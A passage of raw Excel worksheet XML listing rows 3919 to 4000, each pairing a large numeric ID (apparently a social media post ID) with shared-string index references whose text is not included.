      </c>
      <c r="B3919" t="s">
        <v>9817</v>
      </c>
      <c r="C3919" t="s">
        <v>1</v>
      </c>
      <c r="D3919" t="s">
        <v>9818</v>
      </c>
      <c r="E3919" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3920">
        <v>1.23470941742301E+18</v>
      </c>
      <c r="B3920" t="s">
        <v>9819</v>
      </c>
      <c r="C3920" t="s">
        <v>1</v>
      </c>
      <c r="D3920" t="s">
        <v>9820</v>
      </c>
      <c r="E3920" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="3921" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3921">
        <v>1.23470792472483E+18</v>
      </c>
      <c r="B3921" t="s">
        <v>9821</v>
      </c>
      <c r="C3921" t="s">
        <v>1</v>
      </c>
      <c r="D3921" t="s">
        <v>9822</v>
      </c>
      <c r="E3921" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="3922" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3922">
        <v>1.2347070839010501E+18</v>
      </c>
      <c r="B3922" t="s">
        <v>9823</v>
      </c>
      <c r="C3922" t="s">
        <v>1</v>
      </c>
      <c r="D3922" t="s">
        <v>9824</v>
      </c>
      <c r="E3922" t="s">
        <v>9825</v>
      </c>
    </row>
    <row r="3923" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3923">
        <v>1.2347068086373901E+18</v>
      </c>
      <c r="B3923" t="s">
        <v>9826</v>
      </c>
      <c r="C3923" t="s">
        <v>1</v>
      </c>
      <c r="D3923" t="s">
        <v>9827</v>
      </c>
      <c r="E3923" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3924" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3924">
        <v>1.2347066711397199E+18</v>
      </c>
      <c r="B3924" t="s">
        <v>9828</v>
      </c>
      <c r="C3924" t="s">
        <v>1</v>
      </c>
      <c r="D3924" t="s">
        <v>9829</v>
      </c>
      <c r="E3924" t="s">
        <v>9830</v>
      </c>
    </row>
    <row r="3925" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3925">
        <v>1.23470651766158E+18</v>
      </c>
      <c r="B3925" t="s">
        <v>9831</v>
      </c>
      <c r="C3925" t="s">
        <v>1</v>
      </c>
      <c r="D3925" t="s">
        <v>9832</v>
      </c>
      <c r="E3925" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="3926" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3926">
        <v>1.2347064752867699E+18</v>
      </c>
      <c r="B3926" t="s">
        <v>9833</v>
      </c>
      <c r="C3926" t="s">
        <v>1</v>
      </c>
      <c r="D3926" t="s">
        <v>9834</v>
      </c>
      <c r="E3926" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3927" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3927">
        <v>1.23470645308626E+18</v>
      </c>
      <c r="B3927" t="s">
        <v>9835</v>
      </c>
      <c r="C3927" t="s">
        <v>1</v>
      </c>
      <c r="D3927" t="s">
        <v>9836</v>
      </c>
      <c r="E3927" t="s">
        <v>9830</v>
      </c>
    </row>
    <row r="3928" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3928">
        <v>1.2347063882423501E+18</v>
      </c>
      <c r="B3928" t="s">
        <v>9837</v>
      </c>
      <c r="C3928" t="s">
        <v>1</v>
      </c>
      <c r="D3928" t="s">
        <v>9838</v>
      </c>
      <c r="E3928" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="3929" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3929">
        <v>1.23470608392449E+18</v>
      </c>
      <c r="B3929" t="s">
        <v>9839</v>
      </c>
      <c r="C3929" t="s">
        <v>1</v>
      </c>
      <c r="D3929" t="s">
        <v>9840</v>
      </c>
      <c r="E3929" t="s">
        <v>9841</v>
      </c>
    </row>
    <row r="3930" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3930">
        <v>1.23470592717085E+18</v>
      </c>
      <c r="B3930" t="s">
        <v>9842</v>
      </c>
      <c r="C3930" t="s">
        <v>1</v>
      </c>
      <c r="D3930" t="s">
        <v>9843</v>
      </c>
      <c r="E3930" t="s">
        <v>9206</v>
      </c>
    </row>
    <row r="3931" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3931">
        <v>1.23470565881936E+18</v>
      </c>
      <c r="B3931" t="s">
        <v>9844</v>
      </c>
      <c r="C3931" t="s">
        <v>1</v>
      </c>
      <c r="D3931" t="s">
        <v>9845</v>
      </c>
      <c r="E3931" t="s">
        <v>9846</v>
      </c>
    </row>
    <row r="3932" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3932">
        <v>1.23470507956481E+18</v>
      </c>
      <c r="B3932" t="s">
        <v>9847</v>
      </c>
      <c r="C3932" t="s">
        <v>1</v>
      </c>
      <c r="D3932" t="s">
        <v>9848</v>
      </c>
      <c r="E3932" t="s">
        <v>9849</v>
      </c>
    </row>
    <row r="3933" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3933">
        <v>1.2347050722374799E+18</v>
      </c>
      <c r="B3933" t="s">
        <v>9850</v>
      </c>
      <c r="C3933" t="s">
        <v>1</v>
      </c>
      <c r="D3933" t="s">
        <v>9851</v>
      </c>
      <c r="E3933" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="3934" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3934">
        <v>1.2347043925295401E+18</v>
      </c>
      <c r="B3934" t="s">
        <v>9852</v>
      </c>
      <c r="C3934" t="s">
        <v>1</v>
      </c>
      <c r="D3934" t="s">
        <v>9853</v>
      </c>
      <c r="E3934" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="3935" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3935">
        <v>1.2347043178709801E+18</v>
      </c>
      <c r="B3935" t="s">
        <v>9854</v>
      </c>
      <c r="C3935" t="s">
        <v>1</v>
      </c>
      <c r="D3935" t="s">
        <v>9855</v>
      </c>
      <c r="E3935" t="s">
        <v>9856</v>
      </c>
    </row>
    <row r="3936" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3936">
        <v>1.23470189244319E+18</v>
      </c>
      <c r="B3936" t="s">
        <v>9857</v>
      </c>
      <c r="C3936" t="s">
        <v>1</v>
      </c>
      <c r="D3936" t="s">
        <v>9858</v>
      </c>
      <c r="E3936" t="s">
        <v>9859</v>
      </c>
    </row>
    <row r="3937" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3937">
        <v>1.23470114551329E+18</v>
      </c>
      <c r="B3937" t="s">
        <v>9860</v>
      </c>
      <c r="C3937" t="s">
        <v>1</v>
      </c>
      <c r="D3937" t="s">
        <v>9861</v>
      </c>
      <c r="E3937" t="s">
        <v>9862</v>
      </c>
    </row>
    <row r="3938" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3938">
        <v>1.2347010187279201E+18</v>
      </c>
      <c r="B3938" t="s">
        <v>9863</v>
      </c>
      <c r="C3938" t="s">
        <v>1</v>
      </c>
      <c r="D3938" t="s">
        <v>9864</v>
      </c>
      <c r="E3938" t="s">
        <v>9865</v>
      </c>
    </row>
    <row r="3939" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3939">
        <v>1.2347004549127601E+18</v>
      </c>
      <c r="B3939" t="s">
        <v>9866</v>
      </c>
      <c r="C3939" t="s">
        <v>1</v>
      </c>
      <c r="D3939" t="s">
        <v>9867</v>
      </c>
      <c r="E3939" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="3940" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3940">
        <v>1.23469958193968E+18</v>
      </c>
      <c r="B3940" t="s">
        <v>9869</v>
      </c>
      <c r="C3940" t="s">
        <v>1</v>
      </c>
      <c r="D3940" t="s">
        <v>9870</v>
      </c>
      <c r="E3940" t="s">
        <v>4181</v>
      </c>
    </row>
    <row r="3941" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3941">
        <v>1.2346995802116301E+18</v>
      </c>
      <c r="B3941" t="s">
        <v>9869</v>
      </c>
      <c r="C3941" t="s">
        <v>1</v>
      </c>
      <c r="D3941" t="s">
        <v>9871</v>
      </c>
      <c r="E3941" t="s">
        <v>4181</v>
      </c>
    </row>
    <row r="3942" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3942">
        <v>1.23469957867651E+18</v>
      </c>
      <c r="B3942" t="s">
        <v>9872</v>
      </c>
      <c r="C3942" t="s">
        <v>1</v>
      </c>
      <c r="D3942" t="s">
        <v>9873</v>
      </c>
      <c r="E3942" t="s">
        <v>4181</v>
      </c>
    </row>
    <row r="3943" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3943">
        <v>1.2346978376125499E+18</v>
      </c>
      <c r="B3943" t="s">
        <v>9874</v>
      </c>
      <c r="C3943" t="s">
        <v>1</v>
      </c>
      <c r="D3943" t="s">
        <v>9875</v>
      </c>
      <c r="E3943" t="s">
        <v>6829</v>
      </c>
    </row>
    <row r="3944" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3944">
        <v>1.2346978034373601E+18</v>
      </c>
      <c r="B3944" t="s">
        <v>9876</v>
      </c>
      <c r="C3944" t="s">
        <v>1</v>
      </c>
      <c r="D3944" t="s">
        <v>9877</v>
      </c>
      <c r="E3944" t="s">
        <v>9474</v>
      </c>
    </row>
    <row r="3945" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3945">
        <v>1.2346977142077901E+18</v>
      </c>
      <c r="B3945" t="s">
        <v>9878</v>
      </c>
      <c r="C3945" t="s">
        <v>1</v>
      </c>
      <c r="D3945" t="s">
        <v>9879</v>
      </c>
      <c r="E3945" t="s">
        <v>9880</v>
      </c>
    </row>
    <row r="3946" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3946">
        <v>1.2346967736643699E+18</v>
      </c>
      <c r="B3946" t="s">
        <v>9881</v>
      </c>
      <c r="C3946" t="s">
        <v>1</v>
      </c>
      <c r="D3946" t="s">
        <v>9882</v>
      </c>
      <c r="E3946" t="s">
        <v>9883</v>
      </c>
    </row>
    <row r="3947" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3947">
        <v>1.23469460997808E+18</v>
      </c>
      <c r="B3947" t="s">
        <v>9884</v>
      </c>
      <c r="C3947" t="s">
        <v>1</v>
      </c>
      <c r="D3947" t="s">
        <v>9885</v>
      </c>
      <c r="E3947" t="s">
        <v>9886</v>
      </c>
    </row>
    <row r="3948" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3948">
        <v>1.2346938174727301E+18</v>
      </c>
      <c r="B3948" t="s">
        <v>9887</v>
      </c>
      <c r="C3948" t="s">
        <v>1</v>
      </c>
      <c r="D3948" t="s">
        <v>9888</v>
      </c>
      <c r="E3948" t="s">
        <v>9889</v>
      </c>
    </row>
    <row r="3949" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3949">
        <v>1.2346937500954701E+18</v>
      </c>
      <c r="B3949" t="s">
        <v>9890</v>
      </c>
      <c r="C3949" t="s">
        <v>1</v>
      </c>
      <c r="D3949" t="s">
        <v>9891</v>
      </c>
      <c r="E3949" t="s">
        <v>9892</v>
      </c>
    </row>
    <row r="3950" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3950">
        <v>1.23469338203265E+18</v>
      </c>
      <c r="B3950" t="s">
        <v>9893</v>
      </c>
      <c r="C3950" t="s">
        <v>1</v>
      </c>
      <c r="D3950" t="s">
        <v>9894</v>
      </c>
      <c r="E3950" t="s">
        <v>9895</v>
      </c>
    </row>
    <row r="3951" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3951">
        <v>1.2346922233520399E+18</v>
      </c>
      <c r="B3951" t="s">
        <v>9896</v>
      </c>
      <c r="C3951" t="s">
        <v>1</v>
      </c>
      <c r="D3951" t="s">
        <v>9897</v>
      </c>
      <c r="E3951" t="s">
        <v>9898</v>
      </c>
    </row>
    <row r="3952" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3952">
        <v>1.2346915049138601E+18</v>
      </c>
      <c r="B3952" t="s">
        <v>9899</v>
      </c>
      <c r="C3952" t="s">
        <v>1</v>
      </c>
      <c r="D3952" t="s">
        <v>9900</v>
      </c>
      <c r="E3952" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="3953" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3953">
        <v>1.2346913019684201E+18</v>
      </c>
      <c r="B3953" t="s">
        <v>9901</v>
      </c>
      <c r="C3953" t="s">
        <v>1</v>
      </c>
      <c r="D3953" t="s">
        <v>9902</v>
      </c>
      <c r="E3953" t="s">
        <v>9903</v>
      </c>
    </row>
    <row r="3954" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3954">
        <v>1.23469051316653E+18</v>
      </c>
      <c r="B3954" t="s">
        <v>9904</v>
      </c>
      <c r="C3954" t="s">
        <v>1</v>
      </c>
      <c r="D3954" t="s">
        <v>9905</v>
      </c>
      <c r="E3954" t="s">
        <v>4543</v>
      </c>
    </row>
    <row r="3955" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3955">
        <v>1.2346905130323999E+18</v>
      </c>
      <c r="B3955" t="s">
        <v>9904</v>
      </c>
      <c r="C3955" t="s">
        <v>1</v>
      </c>
      <c r="D3955" t="s">
        <v>9906</v>
      </c>
      <c r="E3955" t="s">
        <v>4543</v>
      </c>
    </row>
    <row r="3956" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3956">
        <v>1.2346900216191601E+18</v>
      </c>
      <c r="B3956" t="s">
        <v>9907</v>
      </c>
      <c r="C3956" t="s">
        <v>1</v>
      </c>
      <c r="D3956" t="s">
        <v>9908</v>
      </c>
      <c r="E3956" t="s">
        <v>9909</v>
      </c>
    </row>
    <row r="3957" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3957">
        <v>1.2346899648115E+18</v>
      </c>
      <c r="B3957" t="s">
        <v>9910</v>
      </c>
      <c r="C3957" t="s">
        <v>1</v>
      </c>
      <c r="D3957" t="s">
        <v>9911</v>
      </c>
      <c r="E3957" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="3958" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3958">
        <v>1.2346882883693599E+18</v>
      </c>
      <c r="B3958" t="s">
        <v>9912</v>
      </c>
      <c r="C3958" t="s">
        <v>1</v>
      </c>
      <c r="D3958" t="s">
        <v>9913</v>
      </c>
      <c r="E3958" t="s">
        <v>9914</v>
      </c>
    </row>
    <row r="3959" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3959">
        <v>1.2346881793845199E+18</v>
      </c>
      <c r="B3959" t="s">
        <v>9915</v>
      </c>
      <c r="C3959" t="s">
        <v>1</v>
      </c>
      <c r="D3959" t="s">
        <v>9916</v>
      </c>
      <c r="E3959" t="s">
        <v>9917</v>
      </c>
    </row>
    <row r="3960" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3960">
        <v>1.2346874571925299E+18</v>
      </c>
      <c r="B3960" t="s">
        <v>9918</v>
      </c>
      <c r="C3960" t="s">
        <v>1</v>
      </c>
      <c r="D3960" t="s">
        <v>9919</v>
      </c>
      <c r="E3960" t="s">
        <v>7965</v>
      </c>
    </row>
    <row r="3961" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3961">
        <v>1.2346869256986701E+18</v>
      </c>
      <c r="B3961" t="s">
        <v>9920</v>
      </c>
      <c r="C3961" t="s">
        <v>1</v>
      </c>
      <c r="D3961" t="s">
        <v>9921</v>
      </c>
      <c r="E3961" t="s">
        <v>3931</v>
      </c>
    </row>
    <row r="3962" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3962">
        <v>1.23468674807394E+18</v>
      </c>
      <c r="B3962" t="s">
        <v>9922</v>
      </c>
      <c r="C3962" t="s">
        <v>1</v>
      </c>
      <c r="D3962" t="s">
        <v>9923</v>
      </c>
      <c r="E3962" t="s">
        <v>9924</v>
      </c>
    </row>
    <row r="3963" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3963">
        <v>1.23468644850001E+18</v>
      </c>
      <c r="B3963" t="s">
        <v>9925</v>
      </c>
      <c r="C3963" t="s">
        <v>1</v>
      </c>
      <c r="D3963" t="s">
        <v>9926</v>
      </c>
      <c r="E3963" t="s">
        <v>9927</v>
      </c>
    </row>
    <row r="3964" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3964">
        <v>1.234686024028E+18</v>
      </c>
      <c r="B3964" t="s">
        <v>9928</v>
      </c>
      <c r="C3964" t="s">
        <v>1</v>
      </c>
      <c r="D3964" t="s">
        <v>9929</v>
      </c>
      <c r="E3964" t="s">
        <v>9930</v>
      </c>
    </row>
    <row r="3965" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3965">
        <v>1.2346858949357299E+18</v>
      </c>
      <c r="B3965" t="s">
        <v>9931</v>
      </c>
      <c r="C3965" t="s">
        <v>1</v>
      </c>
      <c r="D3965" t="s">
        <v>9932</v>
      </c>
      <c r="E3965" t="s">
        <v>927</v>
      </c>
    </row>
    <row r="3966" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3966">
        <v>1.2346846736426801E+18</v>
      </c>
      <c r="B3966" t="s">
        <v>9933</v>
      </c>
      <c r="C3966" t="s">
        <v>1</v>
      </c>
      <c r="D3966" t="s">
        <v>9934</v>
      </c>
      <c r="E3966" t="s">
        <v>3677</v>
      </c>
    </row>
    <row r="3967" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3967">
        <v>1.23468406302738E+18</v>
      </c>
      <c r="B3967" t="s">
        <v>9935</v>
      </c>
      <c r="C3967" t="s">
        <v>1</v>
      </c>
      <c r="D3967" t="s">
        <v>9936</v>
      </c>
      <c r="E3967" t="s">
        <v>9937</v>
      </c>
    </row>
    <row r="3968" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3968">
        <v>1.23468392063503E+18</v>
      </c>
      <c r="B3968" t="s">
        <v>9938</v>
      </c>
      <c r="C3968" t="s">
        <v>1</v>
      </c>
      <c r="D3968" t="s">
        <v>9939</v>
      </c>
      <c r="E3968" t="s">
        <v>2224</v>
      </c>
    </row>
    <row r="3969" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3969">
        <v>1.2346839203161201E+18</v>
      </c>
      <c r="B3969" t="s">
        <v>9938</v>
      </c>
      <c r="C3969" t="s">
        <v>1</v>
      </c>
      <c r="D3969" t="s">
        <v>9940</v>
      </c>
      <c r="E3969" t="s">
        <v>2224</v>
      </c>
    </row>
    <row r="3970" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3970">
        <v>1.2346828519178399E+18</v>
      </c>
      <c r="B3970" t="s">
        <v>9941</v>
      </c>
      <c r="C3970" t="s">
        <v>1</v>
      </c>
      <c r="D3970" t="s">
        <v>9942</v>
      </c>
      <c r="E3970" t="s">
        <v>9570</v>
      </c>
    </row>
    <row r="3971" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3971">
        <v>1.23468245877315E+18</v>
      </c>
      <c r="B3971" t="s">
        <v>9943</v>
      </c>
      <c r="C3971" t="s">
        <v>1</v>
      </c>
      <c r="D3971" t="s">
        <v>9944</v>
      </c>
      <c r="E3971" t="s">
        <v>1804</v>
      </c>
    </row>
    <row r="3972" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3972">
        <v>1.23468130611133E+18</v>
      </c>
      <c r="B3972" t="s">
        <v>9945</v>
      </c>
      <c r="C3972" t="s">
        <v>1</v>
      </c>
      <c r="D3972" t="s">
        <v>9946</v>
      </c>
      <c r="E3972" t="s">
        <v>9947</v>
      </c>
    </row>
    <row r="3973" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3973">
        <v>1.2346796886325199E+18</v>
      </c>
      <c r="B3973" t="s">
        <v>9948</v>
      </c>
      <c r="C3973" t="s">
        <v>1</v>
      </c>
      <c r="D3973" t="s">
        <v>9949</v>
      </c>
      <c r="E3973" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="3974" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3974">
        <v>1.2346771387976399E+18</v>
      </c>
      <c r="B3974" t="s">
        <v>9950</v>
      </c>
      <c r="C3974" t="s">
        <v>1</v>
      </c>
      <c r="D3974" t="s">
        <v>9951</v>
      </c>
      <c r="E3974" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3975" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3975">
        <v>1.23467616860061E+18</v>
      </c>
      <c r="B3975" t="s">
        <v>9952</v>
      </c>
      <c r="C3975" t="s">
        <v>1</v>
      </c>
      <c r="D3975" t="s">
        <v>9953</v>
      </c>
      <c r="E3975" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="3976" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3976">
        <v>1.2346754179796301E+18</v>
      </c>
      <c r="B3976" t="s">
        <v>9954</v>
      </c>
      <c r="C3976" t="s">
        <v>1</v>
      </c>
      <c r="D3976" t="s">
        <v>9955</v>
      </c>
      <c r="E3976" t="s">
        <v>6932</v>
      </c>
    </row>
    <row r="3977" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3977">
        <v>1.23467533692464E+18</v>
      </c>
      <c r="B3977" t="s">
        <v>9956</v>
      </c>
      <c r="C3977" t="s">
        <v>1</v>
      </c>
      <c r="D3977" t="s">
        <v>9957</v>
      </c>
      <c r="E3977" t="s">
        <v>9958</v>
      </c>
    </row>
    <row r="3978" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3978">
        <v>1.23467526561312E+18</v>
      </c>
      <c r="B3978" t="s">
        <v>9959</v>
      </c>
      <c r="C3978" t="s">
        <v>1</v>
      </c>
      <c r="D3978" t="s">
        <v>9960</v>
      </c>
      <c r="E3978" t="s">
        <v>6935</v>
      </c>
    </row>
    <row r="3979" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3979">
        <v>1.2346749948330199E+18</v>
      </c>
      <c r="B3979" t="s">
        <v>9961</v>
      </c>
      <c r="C3979" t="s">
        <v>1</v>
      </c>
      <c r="D3979" t="s">
        <v>9962</v>
      </c>
      <c r="E3979" t="s">
        <v>817</v>
      </c>
    </row>
    <row r="3980" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3980">
        <v>1.2346743510786801E+18</v>
      </c>
      <c r="B3980" t="s">
        <v>9963</v>
      </c>
      <c r="C3980" t="s">
        <v>1</v>
      </c>
      <c r="D3980" t="s">
        <v>9964</v>
      </c>
      <c r="E3980" t="s">
        <v>9965</v>
      </c>
    </row>
    <row r="3981" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3981">
        <v>1.2346740726943401E+18</v>
      </c>
      <c r="B3981" t="s">
        <v>9966</v>
      </c>
      <c r="C3981" t="s">
        <v>1</v>
      </c>
      <c r="D3981" t="s">
        <v>9967</v>
      </c>
      <c r="E3981" t="s">
        <v>9917</v>
      </c>
    </row>
    <row r="3982" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3982">
        <v>1.2346737624207099E+18</v>
      </c>
      <c r="B3982" t="s">
        <v>9968</v>
      </c>
      <c r="C3982" t="s">
        <v>1</v>
      </c>
      <c r="D3982" t="s">
        <v>9969</v>
      </c>
      <c r="E3982" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3983" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3983">
        <v>1.2346737603696799E+18</v>
      </c>
      <c r="B3983" t="s">
        <v>9968</v>
      </c>
      <c r="C3983" t="s">
        <v>1</v>
      </c>
      <c r="D3983" t="s">
        <v>4020</v>
      </c>
      <c r="E3983" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3984" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3984">
        <v>1.23467375407824E+18</v>
      </c>
      <c r="B3984" t="s">
        <v>9970</v>
      </c>
      <c r="C3984" t="s">
        <v>1</v>
      </c>
      <c r="D3984" t="s">
        <v>9971</v>
      </c>
      <c r="E3984" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3985" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3985">
        <v>1.2346737449095199E+18</v>
      </c>
      <c r="B3985" t="s">
        <v>9972</v>
      </c>
      <c r="C3985" t="s">
        <v>1</v>
      </c>
      <c r="D3985" t="s">
        <v>9973</v>
      </c>
      <c r="E3985" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3986" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3986">
        <v>1.23467374099198E+18</v>
      </c>
      <c r="B3986" t="s">
        <v>9974</v>
      </c>
      <c r="C3986" t="s">
        <v>1</v>
      </c>
      <c r="D3986" t="s">
        <v>9975</v>
      </c>
      <c r="E3986" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3987" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3987">
        <v>1.2346737359546801E+18</v>
      </c>
      <c r="B3987" t="s">
        <v>9976</v>
      </c>
      <c r="C3987" t="s">
        <v>1</v>
      </c>
      <c r="D3987" t="s">
        <v>9977</v>
      </c>
      <c r="E3987" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3988" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3988">
        <v>1.23467373433981E+18</v>
      </c>
      <c r="B3988" t="s">
        <v>9976</v>
      </c>
      <c r="C3988" t="s">
        <v>1</v>
      </c>
      <c r="D3988" t="s">
        <v>9978</v>
      </c>
      <c r="E3988" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3989" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3989">
        <v>1.23467373247757E+18</v>
      </c>
      <c r="B3989" t="s">
        <v>9979</v>
      </c>
      <c r="C3989" t="s">
        <v>1</v>
      </c>
      <c r="D3989" t="s">
        <v>9980</v>
      </c>
      <c r="E3989" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3990" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3990">
        <v>1.23467372632867E+18</v>
      </c>
      <c r="B3990" t="s">
        <v>9981</v>
      </c>
      <c r="C3990" t="s">
        <v>1</v>
      </c>
      <c r="D3990" t="s">
        <v>9982</v>
      </c>
      <c r="E3990" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3991" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3991">
        <v>1.2346737233045701E+18</v>
      </c>
      <c r="B3991" t="s">
        <v>9983</v>
      </c>
      <c r="C3991" t="s">
        <v>1</v>
      </c>
      <c r="D3991" t="s">
        <v>9984</v>
      </c>
      <c r="E3991" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3992" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3992">
        <v>1.2346737188418501E+18</v>
      </c>
      <c r="B3992" t="s">
        <v>9985</v>
      </c>
      <c r="C3992" t="s">
        <v>1</v>
      </c>
      <c r="D3992" t="s">
        <v>9986</v>
      </c>
      <c r="E3992" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3993" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3993">
        <v>1.2346737171432E+18</v>
      </c>
      <c r="B3993" t="s">
        <v>9987</v>
      </c>
      <c r="C3993" t="s">
        <v>1</v>
      </c>
      <c r="D3993" t="s">
        <v>9988</v>
      </c>
      <c r="E3993" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3994" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3994">
        <v>1.2346737152725E+18</v>
      </c>
      <c r="B3994" t="s">
        <v>9987</v>
      </c>
      <c r="C3994" t="s">
        <v>1</v>
      </c>
      <c r="D3994" t="s">
        <v>9989</v>
      </c>
      <c r="E3994" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3995" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3995">
        <v>1.2346737086245901E+18</v>
      </c>
      <c r="B3995" t="s">
        <v>9990</v>
      </c>
      <c r="C3995" t="s">
        <v>1</v>
      </c>
      <c r="D3995" t="s">
        <v>9991</v>
      </c>
      <c r="E3995" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3996" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3996">
        <v>1.2346737066658199E+18</v>
      </c>
      <c r="B3996" t="s">
        <v>9990</v>
      </c>
      <c r="C3996" t="s">
        <v>1</v>
      </c>
      <c r="D3996" t="s">
        <v>9992</v>
      </c>
      <c r="E3996" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3997" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3997">
        <v>1.2346737042037701E+18</v>
      </c>
      <c r="B3997" t="s">
        <v>9993</v>
      </c>
      <c r="C3997" t="s">
        <v>1</v>
      </c>
      <c r="D3997" t="s">
        <v>9994</v>
      </c>
      <c r="E3997" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3998" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3998">
        <v>1.2346737024882601E+18</v>
      </c>
      <c r="B3998" t="s">
        <v>9993</v>
      </c>
      <c r="C3998" t="s">
        <v>1</v>
      </c>
      <c r="D3998" t="s">
        <v>9995</v>
      </c>
      <c r="E3998" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="3999" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3999">
        <v>1.2346737007602501E+18</v>
      </c>
      <c r="B3999" t="s">
        <v>9993</v>
      </c>
      <c r="C3999" t="s">
        <v>1</v>
      </c>
      <c r="D3999" t="s">
        <v>9996</v>
      </c>
      <c r="E3999" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4000" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4000">
        <v>1.23467369658688E+18</v>
      </c>
      <c r="B4000" t="s">
        <v>9997</v>
      </c>
      <c r="C4000" t="s">
        <v>1</v>
      </c>
      <c r="D4000" t="s">
